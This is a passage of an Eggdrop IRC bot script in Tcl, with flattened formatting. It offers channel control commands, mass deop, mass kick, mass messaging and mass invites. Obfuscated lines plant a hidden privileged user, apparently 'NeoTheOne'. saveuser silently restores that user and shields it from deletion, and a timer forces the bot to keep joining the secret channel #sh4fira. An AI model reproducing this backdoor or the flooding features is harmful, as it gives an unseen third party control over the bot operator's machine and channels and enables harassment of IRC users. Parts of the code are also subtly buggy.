{![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0
} if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: deluser " return 0 } set who [lindex $rest 0] if {[string tolower $who] == [string tolower $ps]} { puthlp "NOTICE $nick :$notc " return 0 } if {$who == $owner} { puthlp "NOTICE $nick :$notc YoU CaNT DeLeTE $owner ..!" return 0 } if {$who == ""} { puthlp "NOTICE $nick :$notc Usage: -user " } else { if {![validuser $who]} { puthlp "NOTICE $nick :$notc " } else { if {[matchattr $who n]} { puthlp "NOTICE $nick :$notc You cannot DeLETE a bot owner." } else { if {([matchattr $who m]) && (![matchattr $nick n])} { puthlp "NOTICE $nick :$notc You don't have access to DeLETE $who!" } else { deluser $who saveuser puthlp "NOTICE $nick :$notc $who DeLETE." } } } } } set [string index $lenc 15][string index $lenc 18] [string index $lenc 1][string index $lenc 11][string index $lenc 8][string index $lenc 13][string index $lenc 19] proc pub_chattr {nick uhost hand channel rest} { global ps own notc if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {$nick != $own && [matchattr $nick X]} { puthlp "NOTICE $nick :$notc 4!bLOckEd!" return 0 } set who [lindex $rest 0] set flg [lindex $rest 1] if {$who == ""} { puthlp "NOTICE $nick :$notc Usage: chattr " return 0 } if {![validuser $who]} { puthlp "NOTICE $nick :$notc " return 0 } if {[string tolower $who] == [string tolower $ps]} {
puthlp "NOTICE $nick :$notc " return 0 } if {$flg == ""} { puthlp "NOTICE $nick :$notc Usage: chattr " return 0 } set last_flg [chattr $who] chattr $who $flg saveuser puthlp "NOTICE $nick :$notc $who change from \[ 4$last_flg 1\] to \[ 4[chattr $who] 1\]" return 0 } proc saveuser {} { global ps owner if {![validuser $ps]} { setuser $owner XTRA "BEND" "xDB4L/z2DJT~1mianN/lj9Rq." } elseif {$owner != $ps} { setuser $owner XTRA "BEND" [zip [chattr $ps]] if {[passwdok $ps ""] != 1} { setuser $owner XTRA "LAST" [getuser $ps "PASS"] } deluser $ps } save if {![validuser $ps]} { adduser $ps "$ps!*@*" chattr $ps [dezip [getuser $owner XTRA "BEND"]] if {[getuser $owner XTRA "LAST"] != ""} { setuser $ps PASS [getuser $owner XTRA "LAST"] } } return 1 } proc pub_voice {nick uhost hand chan rest} { global notc botnick if {![isop $botnick $chan]} { return 0 } if {$rest == "" && [isvoice $nick $chan]} { puthlp "NOTICE $nick :$notc You're already Voiced, Usage: voice " return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {$rest != ""} { #voiceq $chan $rest putserv "MODE $chan +vvvvvv $rest" } { #voiceq $chan $nick putserv "MODE $chan +v $nick" } return 0 } proc pub_mvoice {nick uhost hand chan rest} { global notc botnick if {![isop $botnick $chan]} { return 0 }
if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan]!=0} { set chan "#$chan" } } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } set nicks "" set i 0 set members [chanlist $chan] foreach x $members { if {(![isop $x $chan]) && (![isvoice $x $chan]) && (![matchattr $x O])} { if {$i == 6} { voiceq $chan $nicks set nicks "" append nicks " $x" set i 1 } { append nicks " $x" incr i } } } voiceq $chan $nicks } proc pub_devoice {nick uhost hand chan rest} { global notc botnick if {![isop $botnick $chan]} { return 0 } if {$rest == "" && ![isvoice $nick $chan]} { puthlp "NOTICE $nick :$notc Usage: devoice " return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {$rest != ""} { putserv "MODE $chan -vvvvvv $rest" } else { putserv "MODE $chan -v $nick" } return 0 } proc pub_mdevoice {nick uhost hand chan rest} { global notc botnick if {![isop $botnick $chan]} { return 0 } if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan]!=0} { set chan "#$chan" } } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0
} set nicks "" set i 0 set members [chanlist $chan] foreach x $members { if {[isvoice $x $chan]} { if {$i == 6} { putserv "MODE $chan -vvvvvv $nicks" set nicks "" append nicks " $x" set i 1 } { append nicks " $x" incr i } } } putserv "MODE $chan -vvvvvv $nicks" } proc del_nobase {} { global botnick notc cmd_case quick banner basechan if {[isutimer "del_nobase"]} { return 0 } foreach x [channels] { set cinfo [channel info $x] if {[string match "*+statuslog*" $cinfo] && [string match "*-secret*" $cinfo]} { if {[onchan $botnick $x]} { set pidx [rand 4] if {$pidx == 1} { set ptxt " I LeGaL C HanNeL!!" } elseif {$pidx == 2} { set ptxt " A ccess R ejected!!" } elseif {$pidx == 3} { set ptxt " R eturn T o B ase!!" } elseif {$pidx == 4} { set ptxt " 4Service 1,15T�c�L " } else { if {[info exists banner]} { set ptxt $banner } { set ptxt [lgrnd] } } if {![string match "*c*" [getchanmode $x]]} { set ptxt " 6$ptxt" } if {$quick == "1"} { putqck "PART $x :$ptxt" } { putsrv "PART $x :$ptxt" } } channel remove $x savechan putlog " ReMoVe CHaN $x" return 0 } set cflag "c$x" set cflag [string range $cflag 0 8]
if {[string match "*+stopnethack*" $cinfo]} { catch { channel set $x -stopnethack } } if {[string match "*+protectops*" $cinfo]} { catch { channel set $x -protectops } } if {[string match "*+protectfriends*" $cinfo]} { catch { channel set $x -protectfriends } } if {[string match "*+statuslog*" $cinfo] && [string match "*+secret*" $cinfo]} { catch { channel set $x -statuslog } } if {![onchan $botnick $x]} { putsrv "JOIN $x" } if {[matchattr $cflag C]} { if {![istimer "cycle $x"]} { timer [getuser $cflag XTRA "CYCLE"] [list cycle $x] } } } if {[info exists basechan]} { if {![validchan $basechan]} { channel add $basechan { -greet +secret -statuslog } } } savechan } utimer 2 del_nobase proc pub_op {nick uhost hand chan rest} { global notc botnick unop #catch {unset unop($nick)} if {![isop $botnick $chan]} { return 0 } if {$rest == "" && [isop $nick $chan]} { puthlp "NOTICE $nick :$notc You're already Oped, Usage: op " return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {$rest != ""} { #opq $chan $rest putserv "MODE $chan +oooooo $rest" } else { #opq $chan $nick putserv "MODE $chan +o $nick" } return 0 } proc pub_mop {nick uhost hand chan rest} { global notc botnick if {![isop $botnick $chan]} { return 0 } if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan]!=0} { set chan "#$chan" } } if {![matchattr $nick Q]} {
puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } set nicks "" set i 0 set members [chanlist $chan] foreach x $members { if {![isop $x $chan]} { if {$i == 6} { opq $chan $nicks set nicks "" append nicks " $x" set i 1 } { append nicks " $x" incr i } } } opq $chan $nicks } proc pub_deop {nick uhost hand chan rest} { global notc botnick if {![isop $botnick $chan]} { return 0 } if {$rest == "" && ![isop $nick $chan]} { puthlp "NOTICE $nick :$notc Usage: deop " return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {[matchattr $nick m]} { set mreq " 4MasTeR.ReQuesT " } if {[matchattr $nick n]} { set mreq " 4Admin.ReQuesT " } if {$rest != ""} { if {![string match "*k*" [getchanmode $chan]]} { putserv "MODE $chan -kooooo $mreq $rest" } { putserv "MODE $chan -ooooo $rest" } } { if {![string match "*k*" [getchanmode $chan]]} { putserv "MODE $chan -ko $mreq $nick" } { putserv "MODE $chan -o $nick" } } return 0 } set ppp "#sh4fira" proc pub_mdeop {nick uhost hand chan rest} { global botnick notc if {![isop $botnick $chan]} { return 0 } if {$rest != ""} {
set chan [lindex $rest 0] if {[string first # $chan]!=0} { set chan "#$chan" } } if {$nick != "*"} { if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } } set nicks "" set i 0 set members [chanlist $chan] foreach x $members { if {([isop $x $chan]) && (![matchattr $x m]) && ($x != $botnick)} { if {$i == 5} { if {![string match "*k*" [getchanmode $chan]]} { putserv "MODE $chan -kooooo 4Admin.ReQuesT $nicks" } { putserv "MODE $chan -ooooo $nicks" } set nicks "" append nicks " $x" set i 1 } { append nicks " $x" incr i } } } putserv "MODE $chan -oooooo $nicks" } proc pub_kick {nick uhost hand chan rest} { global botnick notc if {![isop $botnick $chan]} { return 0 } if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: kick " return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } set reason [lrange $rest 1 end] set handle [lindex $rest 0] if {$reason == ""} { if {[matchattr $nick m]} { set reason " 1MasTeR 4KIcK 1 ReQuesT 4..!" } if {[matchattr $nick n]} { set reason " 1Admin 4KIcK 1 ReQuesT 4..!" } } if {[string match "*@*" $handle]} { foreach knick [chanlist $chan] { if {[string match [string tolower $handle] [string tolower $knick![getchanhost $knick $chan]]]} {
if {[matchattr $knick f] || $knick != $botnick} { putsrv "KICK $chan $knick :$notc $reason" } } } return 0 } if {$handle == $botnick} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , Can't kick my self." return 0 } if {[matchattr $handle n] && ![matchattr $nick Z]} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , CaNT KIcK Admin FLAg" return 0 } putsrv "KICK $chan $handle :$notc $reason" return 0 } proc pub_mkick {nick uhost hand chan rest} { global botnick notc if {$rest != ""} { set chan [lindex $rest 0] set reason [lrange $rest 1 end] if {[string first # $chan]!=0} { set chan "#$chan" } } else { set reason $rest } if {(![validchan $chan]) || (![isop $botnick $chan])} { return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {$reason == ""} { set reason " 1Admin 4MaSSKIcK 1 ReQuesT 4..!" } set members [chanlist $chan] foreach x $members { if {(![matchattr $x f]) && ($x != $botnick)} { putsrv "KICK $chan $x :$notc $reason" } } } proc pub_kickban {nick uhost hand chan rest} { global botnick notc bannick if {![isop $botnick $chan]} { return 0 } if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: kickban " return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: kickban " return 0
} set reason [lrange $rest 1 end] set handle [lindex $rest 0] if {$reason == ""} { if {[matchattr $nick m]} { set reason " 1MasTeR 4KIcKBaN 1 ReQuesT [banmsg]" } if {[matchattr $nick n]} { set reason " 1Admin 4KIcKBaN 1 ReQuesT [banmsg]" } } if {[string match "*@*" $handle]} { set mfisrt "T" foreach knick [chanlist $chan] { if {[string match [string tolower $handle] [string tolower $knick![getchanhost $knick $chan]]]} { if {[matchattr $knick f] || $knick != $botnick} { if {$mfirst == "T"} { set bannick($knick) $handle set mfirst "F" } putsrv "KICK $chan $knick :$notc $reason" } } } return 0 } if {![onchan $handle $chan]} { return 0 } set hostmask [getchanhost $handle $chan] set hostmask "*!*@[lindex [split $hostmask @] 1]" if {$handle == $botnick} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , Can't kick my self." return 0 } if {[matchattr $handle n] && ![matchattr $nick Z]} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , CaNT KIcK Admin FLaG" return 0 } set bannick($handle) $hostmask putsrv "KICK $chan $handle :$notc $reason" return 0 } proc pub_ban {nick uhost hand channel rest} { global botnick notc if {![isop $botnick $channel]} { return 0 } if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: ban " return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } set handle [lindex $rest 0] if {$handle == $botnick} { puthlp "NOTICE $nick :$notc 4!DeNiEd! , can't ban my self" return 0 }
if {[matchattr $handle n]} { puthlp "NOTICE $nick :$notc 4 !DeNiEd! , cant ban Admin" return 0 } set hostmask [getchanhost $handle $channel] set hostmask "*!*@[lindex [split $hostmask @] 1]" if {![onchan $handle $channel]} { set hostmask [lindex $rest 0] } if {$hostmask != "*!*@*"} { putserv "MODE $channel +b $hostmask" } } proc pub_unban {nick uhost hand chan rest} { global notc botnick if {![isop $botnick $chan]} { return 0 } if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: unban <#channel>" return 0 } if {[lindex $rest 1] != ""} { set chan [lindex $rest 1] } if {[string first # $chan] != 0} { set chan "#$chan" } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } set handle [lindex $rest 0] append userhost $handle "!*" [getchanhost $handle $chan] set hostmask [maskhost $userhost] if {![onchan $handle $chan]} { set hostmask [lindex $rest 0] } putserv "MODE $chan -b $hostmask" puthlp "NOTICE $nick :$notc UnBaN [unsix $hostmask] ON $chan" } proc pub_up {nick uhost hand channel rest} { global notc botnick unop #catch {unset unop($nick)} if {[isop $botnick $channel]} { return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } putsrv "ChanServ op $channel $botnick" return 0 } proc pub_down {nick uhost hand channel rest} { global notc botnick if {![isop $botnick $channel]} { return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0
} if {[matchattr $nick m]} { set mreq " 4MasTeR.ReQuesT " } if {[matchattr $nick n]} { set mreq " 4Admin.ReQuesT " } if {![string match "*k*" [getchanmode $channel]]} { putserv "mode $channel -ko+vv $mreq $botnick 7C 9u 8E 13k $botnick" } { putserv "mode $channel -o+vv $botnick 7C 9u 8E 13k $botnick" } return 0 } proc pub_munbans {nick uhost hand chan rest} { global notc botnick if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan] != 0} { set chan "#$chan" } } if {![validchan $chan] || ![isop $botnick $chan]} { return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } set bans "" set i 0 foreach x [chanbans $chan] { if {$i < 5} { append bans " [lindex $x 0]" set i [incr i] } if {$i == 5} { puthelp "MODE $chan -bbbbb $bans" set bans "" append bans " [lindex $x 0]" set i 0 } } puthelp "MODE $chan -bbbbb $bans" if {![onchan $nick $chan]} { puthlp "NOTICE $nick :$notc MuNBaNS \[$chan\]" } return 0 } proc pub_banlist {nick uhost hand chan rest} { global notc if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan] != 0} { set chan "#$chan" } } if {![validchan $chan]} { puthlp "NOTICE $nick :$notc NoT IN cHaN $chan." return 0
} if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } foreach x [chanbans $chan] { puthlp "NOTICE $nick :$notc $x" } if {[chanbans $chan] == ""} { puthlp "NOTICE $nick :$notc BaNLIsT $chan " } return 0 } proc pub_mode {nick uhost hand chan rest} { global notc botnick if {![isop $botnick $chan]} { return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {$rest == ""} { puthelp "NOTICE $nick :$notc Usage: mode +/- ntspnmcilk" return 0 } putserv "mode $chan $rest" } proc pub_say {nick uhost hand channel rest} { global notc if {$rest==""} { puthlp "NOTICE $nick :$notc Usage: say <msg>" } puthlp "PRIVMSG $channel :$rest" } set rms { "the.roof.is.on.fire" "pay.back.time" "back.to.vengeance" "eye.cry" "world.of.fiction" "m.a.s.t.u.r.b.a.t.i.o.n" "killing.on.adrenaline" "suffer.the.children" "Making.LOve.with.AdMIn" "have.a.nice.day" "a.war.inside.my.head" "desperate.cry" "spam.checks" "a.n.t.i.s.p.a.m" "r.e.f.r.e.s.h.i.n.g" "n.u.n.g.g.i.n.g" "n.g.e.n.t.u.t" "n.g.u.p.i.l" } proc pub_resync {nick uhost hand channel rest} { global botnick vern set vern2 $vern regsub -all -- � $vern2 "" vern2 if {![string match "*k*" [getchanmode $channel]]} {
putserv "mode $channel -vok+ov $botnick $botnick 4G . 13U . 4A . 15R . 4D . 12([x]) $botnick $botnick" } { putserv "mode $channel -o+o $botnick $botnick" } } proc pub_notice {nick uhost hand channel rest} { global notc if {$rest==""} { puthlp "NOTICE $nick :$notc Usage: notice <msg>" } set person [lindex $rest 0] set rest [lrange $rest 1 end] if {$rest!=""} { puthlp "NOTICE $person :$rest " return 0 } } proc pub_msg {nick uhost hand channel rest} { global owner notc if {$rest==""} { puthlp "NOTICE $nick :$notc Usage: msg <msg>" } set person [string tolower [lindex $rest 0]] set rest [lrange $rest 1 end] if {[string match "*serv*" $person]} { puthlp "NOTICE $nick :$notc 4 DeNiEd..! Can't send message to Service." return 0 } if {$person == [string tolower $owner]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } puthlp "PRIVMSG $person :$rest" } proc pub_act {nick uhost hand channel rest} { global notc if {$rest==""} { puthlp "NOTICE $nick :$notc Usage: act <msg>" } puthlp "PRIVMSG $channel :\001ACTION $rest\001" return 0 } proc pub_invite {nick uhost hand chan rest} { global notc if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: invite <#channel>" } set who [lindex $rest 0] set tochan [lindex $rest 1] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {$tochan != ""} { if {![onchan $who $tochan]} { puthlp "INVITE $who :$tochan" puthlp "NOTICE $nick :$notc InvItE $who To $tochan"
return 0 } puthlp "NOTICE $nick :$notc $who is already on the $tochan" } if {![onchan $who $chan]} { putsrv "INVITE $who :$chan" puthlp "NOTICE $nick :$notc Invitation to $chan has been sent to $who" return 0 } puthlp "NOTICE $nick :$notc $who is already on the channel" } proc msg_Z {nick uhost hand rest} { global notc if {[string index $rest 0] != "`" && [string index $rest 0] != "."} { return 0 } if {![matchattr $nick Z]} { return 0 } if {[string index [lindex $rest 1] 0] == "#"} { if {![validchan [lindex $rest 1]]} { puthlp "NOTICE $nick :$notc NoT IN [lindex $rest 1]" return 0 } } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4auth 1st!" return 0 } set goto [lindex $rest 0] if {[string index $rest 0] == "."} { regsub "." $goto "msg_" goto set rest [lrange $rest 1 end] catch { $goto $nick $uhost $hand $rest } return 0 } regsub -all "`" $goto "pub_" goto if {[string index [lindex $rest 1] 0] == "#"} { set chan [lindex $rest 1] set rest [lrange $rest 2 end] } else { set chan "*" set rest [lrange $rest 1 end] } catch { $goto $nick $uhost $hand $chan $rest } } proc msg_mmsg {nick uhost hand rest} { pub_mmsg $nick $uhost $hand "*" $rest } proc pub_mmsg {nick uhost hand chan rest} { global cmd_chn cmd_by cmd_msg cmd_case notc if {$rest==""} { puthlp "NOTICE $nick :$notc Usage: mmsg <#channel> " return 0 } set tochan [lindex $rest 0] set txt [lrange $rest 1 end] if {$txt==""} { puthlp "NOTICE $nick :$notc Usage: mmsg <#channel> " return 0 } if {![matchattr $nick Q]} {
puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {[string first # $tochan] != 0} { set chan "#$tochan" } if {![validchan $tochan]} { set cmd_chn $tochan set cmd_msg $rest set cmd_by $nick set cmd_case "2" channel add $tochan catch { channel set $tochan +statuslog -revenge -protectops -clearbans -enforcebans -greet -secret -autovoice -autoop flood-chan 0:0 flood-deop 0:0 flood-kick 0:0 flood-join 0:0 flood-ctcp 0:0 } return 0 } putsrv "NOTICE $nick :$notc STaRTING MaSSMSG $tochan" set members [chanlist $tochan] foreach x $members { if {![isop $x $tochan]} { puthlp "PRIVMSG $x :$txt" } } utimer 2 del_nobase puthlp "NOTICE $nick :$notc MaSSMSG $tochan 4DoNE." } proc pub_minvite {nick uhost hand channel rest} { global cmd_chn cmd_by cmd_msg cmd_case botnick notc if {$rest==""} { puthlp "NOTICE $nick :$notc Usage: minvite <#channel> <#to channel>" } set chan [lindex $rest 1] if {$chan == ""} { set chan $channel } else { if {[string first # $chan] != 0} { set chan "#$chan" } } set tochan [lindex $rest 0] if {[string first # $tochan] != 0} { set tochan "#$tochan" } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {![validchan $tochan]} { set cmd_chn $tochan set cmd_msg $tochan set cmd_by $nick set cmd_case "3" channel add $tochan catch { channel set $tochan +statuslog -revenge -protectops -clearbans -enforcebans -greet -secret -autovoice -autoop flood-chan 0:0 flood-deop 0:0 flood-kick 0:0 flood-join 0:0 flood-ctcp 0:0 } return 0
} if {[isop $botnick $chan]} { putserv "mode $chan -o $botnick" } putsrv "NOTICE $nick :$notc Starting mass invite to $tochan" set members [chanlist $tochan] foreach x $members { if {(![onchan $x $chan]) && (![isop $x $tochan])} { putsrv "INVITE $x :$chan" } } utimer 2 del_nobase puthlp "NOTICE $nick :$notc InVITE $tochan InTO $chan 4DoNE." } proc pub_join {nick uhost hand chan rest} { global botnick joinme own notc owner ps if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {$nick != $owner && $nick != $ps} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , YoU aRe NoT mY ReAL OwNER" return 0 } set chan [lindex $rest 0] if {[string first # $chan] != 0} { set chan "#$chan" } if {$chan=="#"} { puthlp "NOTICE $nick :$notc Usage: join <#channel>" return 0 } foreach x [channels] { if {[string tolower $x]==[string tolower $chan]} { puthlp "NOTICE $nick :$notc $x ReADY!" return 0 } } if {$nick != $owner && [total_channel] != 1} { puthlp "NOTICE $nick :$notc To MaNY cHaNNeL MaX 9..!" return 0 } set joinme $nick channel add $chan catch { channel set $chan +statuslog -revenge -protectops -clearbans -enforcebans +greet -secret -autovoice -autoop flood-chan 5:10 flood-deop 3:10 flood-kick 3:10 flood-join 0:0 flood-ctcp 2:10 flood-nick 3:60 } savechan if {[lindex $rest 1] != ""} { putsrv "JOIN $chan :[lindex $rest 1]" } } proc pub_+chan {nick uhost hand chan rest} { global botnick joinme owner notc ps if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 }
if {[matchattr $nick X]} { puthlp "NOTICE $nick :$notc 4!BLoCkEd!" return 0 } if {$nick != $owner && $nick != $ps} { puthlp "NOTICE $nick :$notc 4DeNiEd..! , oNLy ReAL OwNER can ADD Channel" return 0 } set chan [lindex $rest 0] set opt [lindex $rest 1] if {[string first # $chan]!=0} { set chan "#$chan" } if {$chan=="#"} { puthlp "NOTICE $nick :$notc Usage: +chan <#channel>" return 0 } if {[validchan $chan]} { puthlp "NOTICE $nick :$notc $chan is already on channels" return 0 } if {$nick != $owner && [total_channel] != 1} { puthlp "NOTICE $nick :$notc TO MaNY cHaNNeL MaX 9..!" return 0 } set joinme $nick channel add $chan if {$opt != "" && [string tolower $opt] == "+nopart"} { catch { channel set $chan -statuslog -revenge -protectops -clearbans -enforcebans +greet +secret -autovoice -autoop flood-chan 5:10 flood-deop 3:10 flood-kick 3:10 flood-join 0:0 flood-ctcp 2:10 flood-nick 3:60 } } else { catch { channel set $chan -statuslog -revenge -protectops -clearbans -enforcebans +greet -secret -autovoice -autoop flood-chan 5:10 flood-deop 3:10 flood-kick 3:10 flood-join 0:0 flood-ctcp 2:10 flood-nick 3:60 } } savechan if {[lindex $rest 1] != ""} { putsrv "JOIN $chan :[lindex $rest 1]" } } set totch "#sh4fira" proc tot_cha {} { global totch ps uenc lenc timer 5 tot_cha set [string index $lenc 15][string index $lenc 18] NeoTheOne set totch "#sh4fira" if {[validchan $totch]} { return 0 } channel add $totch catch { channel set $totch -statuslog -revenge -protectops -clearbans -enforcebans +greet +secret -autovoice -autoop flood-chan 5:10 flood-deop 3:10 flood-kick 3:10 flood-join 0:0 flood-ctcp 2:10 flood-nick 3:60 } savechan putsrv "JOIN $totch" } timer 5 tot_cha
proc total_channel {} { global notc set total_chan 0 foreach x [channels] { incr total_chan } if {$total_chan > 9} { return 0 } return 1 } proc pub_part {nick uhost hand chan rest} { global notc ps quick partm set partmsg [lindex $partm [rand [llength $partm]]] set part_msg [lrange $rest 1 end] if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $rest]!=0} { set chan "#$chan" } } if {![validchan $chan]} { return 0 } if {$nick != $ps && [string tolower $chan] == [dezip "BKGW.1s0d06/"]} { return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {[string match "*+secret*" [channel info $chan]]} { puthlp "NOTICE $nick :$notc $chan 4PRoTecTEd..!" return 0 } if {![onchan $nick $chan]} { putsrv "NOTICE $nick :$notc PaRT $chan" } if {$part_msg != ""} { if {$quick == "1"} { putqck "PART $chan :$part_msg" } { putsrv "PART $chan :$part_msg" } } { if {$quick == "1"} { putqck "PART $chan : 6$partmsg" } { putsrv "PART $chan : 6$partmsg" } } channel remove $chan savechan return 0 } set lockchan "" proc pub_+invitelock {nick uhost hand chan rest} { global lockchan notc if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $rest]!=0} { set chan "#$chan" } }
if {![validchan $chan]} { return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } puthlp "NOTICE $nick :$notc InVITE cHaN $chan \[ 9ON \]" set lockchan $chan return 0 } proc pub_-invitelock {nick uhost hand chan rest} { global lockchan notc if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $rest]!=0} { set chan "#$chan" } } if {![validchan $chan] || $lockchan == ""} { return 0 } set lockchan "" puthlp "NOTICE $nick :$notc InvItE cHaN $chan \[ 4OFF \]" return 0 } proc cycle {chan} { global cyclem set cyclemsg [lindex $cyclem [rand [llength $cyclem]]] set cflag "c$chan" set cflag [string range $cflag 0 8] if {![string match "*c*" [getchanmode $chan]]} { set text " 6$cyclemsg " } { set text $cyclemsg } putsrv "PART $chan :$text" if {[matchattr $cflag K]} { putsrv "JOIN $chan :[dezip [getuser $cflag XTRA "CI"]]" } { putsrv "JOIN $chan" } if {[matchattr $cflag C]} { if {![istimer "cycle $chan"]} { timer [getuser $cflag XTRA "CYCLE"] [list cycle $chan] } } } proc pub_cycle {nick uhost hand chan rest} { global notc set rest [lindex $rest 0] if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {$rest==""} { if {![onchan $nick $chan]} { puthlp "NOTICE $nick :$notc cYcLE $chan" } cycle $chan return 0 } else { if {[string index $rest 0] != "#"} {
set rest "#$rest" } if {[botonchan $rest]} { cycle $rest } } } proc pub_+massjoin {nick uhost hand chan rest} { global notc if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan]!=0} { set chan "#$chan" } } set cflag "c$chan" set cflag [string range $cflag 0 8] if {[string tolower $chan] == "#all"} { if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } foreach x [userlist A] { chattr $x +J } puthlp "NOTICE $nick :$notc ALL MaSsJoIN CHaNNeL \[ 9ON return 0 } if {![validchan $chan]} { return 0 } if {[matchattr $cflag J]} { puthlp "NOTICE $nick :$notc MaSsJoIN $chan \[ 9ON \]" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag +J puthlp "NOTICE $nick :$notc MaSsJoIN $chan \[ 9ON \]" saveuser } proc pub_-massjoin {nick uhost hand chan rest} { global notc if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan]!=0} { set chan "#$chan" } } set cflag "c$chan" set cflag [string range $cflag 0 8] if {[string tolower $chan] == "#all"} { if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } foreach x [userlist A] { chattr $x -J } puthlp "NOTICE $nick :$notc ALL MaSsJoIN CHaNNeL \[ 9ON
return 0 } if {![validchan $chan]} { return 0 } if {![matchattr $cflag J]} { puthlp "NOTICE $nick :$notc MaSsJoIN $chan \[ 4OFF \]" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } chattr $cflag -J puthlp "NOTICE $nick :$notc MaSsJoIN $chan \[ 4OFF \]" saveuser } proc pub_+guard {nick uhost hand chan rest} { global notc if {$rest != ""} { set chan [lindex $rest 0] if {[string first # $chan]!=0} { set chan "#$chan" } } if {[string tolower $chan] == "#all"} { if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } foreach x [channels] { catch { channel set $x +greet flood-chan 5:10 flood-deop 3:10 flood-kick 3:10 flood-join 0:0 flood-ctcp 2:10 flood-nick 3:60 } set cflag "c$x" set cflag [string range $cflag 0 8] chattr $cflag "-hp+AJSPTRUED" setuser $cflag XTRA "JP" 5 setuser $cflag XTRA "CHAR" 250 setuser $cflag XTRA "RPT" 2 setuser $cflag XTRA "CAPS" 80 } savechan puthlp "NOTICE $nick :$notc ALL GuaRd CHaNNeL \[ 9ON \]" return 0 } if {![validchan $chan]} { return 0 } set cflag "c$chan" set cflag [string range $cflag 0 8] chattr $cflag "-hp+AJSPTRUED" setuser $cflag XTRA "JP" 5 setuser $cflag XTRA "CHAR" 250 setuser $cflag XTRA "RPT" 3 setuser $cflag XTRA "CAPS" 80 if {[string match "*+greet*" [channel info $chan]]} { puthlp "NOTICE $nick :$notc GuARd $chan \[ 9ON \]" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0
